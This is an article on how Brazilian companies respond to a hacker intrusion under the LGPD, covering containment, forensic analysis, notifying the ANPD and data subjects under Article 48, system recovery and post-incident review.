The occurrence of a security incident resulting in a hacker invasion is undoubtedly one of the biggest nightmares for any company today. Besides the immediate impact on business, there are legal and reputation implications that can persist for months or even years. In Brazil, the General Data Protection Law (LGPD) establishes a series of requirements that companies must follow after such incidents.
According to a recent report by Federasul – Federation of Business Entities of Rio Grande do Sul -, over 40% of Brazilian companies have already been targeted by some type of cyberattack. However, many of these companies still struggle to comply with the legal requirements set by the LGPD. Data from the National Data Protection Authority (ANPD) reveal that only about 30% of invaded companies officially declared the incident occurrence. This discrepancy can be attributed to various factors, including lack of awareness, complexity of compliance processes, and fear of negative repercussions on the company’s reputation.
The day after the incident: first steps
After confirming a hacker invasion, the first step is to contain the incident to prevent its spread. This includes isolating the affected systems, stopping unauthorized access, and implementing damage control measures.
Simultaneously, it is important to assemble an incident response team, which should include information security experts, IT professionals, lawyers, and communication consultants. This team will be responsible for a series of decision-making processes – mainly those involving business continuity in the following days.
When it comes to compliance with the LGPD, it is necessary to document all actions taken during the incident response. This documentation will serve as evidence that the company acted in accordance with legal requirements and could be used in eventual audits or investigations by the ANPD.
In the early days, the response team must conduct a detailed forensic analysis to identify the origin of the breach, the method used by hackers, and the extent of the compromise. This process is vital not only to understand the technical aspects of the attack but also to collect evidence that will be needed to report the incident to the relevant authorities and also to the insurer – if the company has taken out cyber insurance.
There is a very important aspect here: forensic analysis also serves to determine if attackers are still within the company’s network – a situation that, unfortunately, is quite common, especially if after the incident the company is facing some kind of financial blackmail through the release of data that criminals may have stolen.
Furthermore, the LGPD, in its article 48, requires the data controller to notify the National Data Protection Authority (ANPD) and the data subjects affected by the occurrence of a security incident that may pose a relevant risk or harm to the data subjects. This communication must be made within a reasonable time frame, as specified by ANPD regulations, and must include information about the nature of the affected data, the individuals involved, the technical and security measures used to protect the data, the risks related to the incident, and the measures that have been or will be taken to reverse or mitigate the effects of the damage.
Based on this legal requirement, it is essential, right after the initial analysis, to prepare a detailed report that includes all the information mentioned by the LGPD. In this, forensic analysis also helps determine if there has been data extraction and theft – to the extent that criminals may be claiming.
This report must be reviewed by compliance professionals and company lawyers before being submitted to the ANPD. The legislation also requires the company to provide clear and transparent communication to the data subjects affected, explaining what happened, the measures taken, and the next steps to ensure the protection of personal data.
Transparency and effective communication, by the way, are fundamental pillars during the management of a security incident. Management must maintain constant communication with internal and external teams, ensuring that all involved parties are informed about the progress of the actions and the next steps.
Security policy assessment is a necessary action
Alongside communication with stakeholders, the company must initiate a process of evaluating and reviewing its security policies and practices. This includes reassessing all security controls, accesses, high-level access credentials, as well as implementing additional measures to prevent future incidents.
In parallel with the review and analysis of affected systems and processes, the company must also focus on system recovery and restoration of its operations. This involves cleaning all affected systems, applying security patches, restoring backups, and revalidating access controls. It is essential to ensure that the systems are completely secure before they are put back into operation.
Once the systems are operational again, a post-incident review must be conducted to identify lessons learned and areas for improvement. This review should involve all relevant parties and result in a final report that highlights the incident’s causes, actions taken, impacts, and recommendations to enhance the company’s security posture in the future.
In addition to technical and organizational actions, managing a security incident requires a proactive approach to governance and security culture. This includes implementing an ongoing cybersecurity improvement program and promoting a corporate culture that values security and privacy.
Responding to a security incident requires a set of coordinated and well-planned actions, aligned with LGPD requirements. From initial containment and communication with stakeholders to system recovery and post-incident review, each step is essential to minimize negative impacts and ensure legal compliance. Furthermore, it is necessary to confront failures and correct them – above all, an incident should elevate the company’s cybersecurity strategy to a new level.
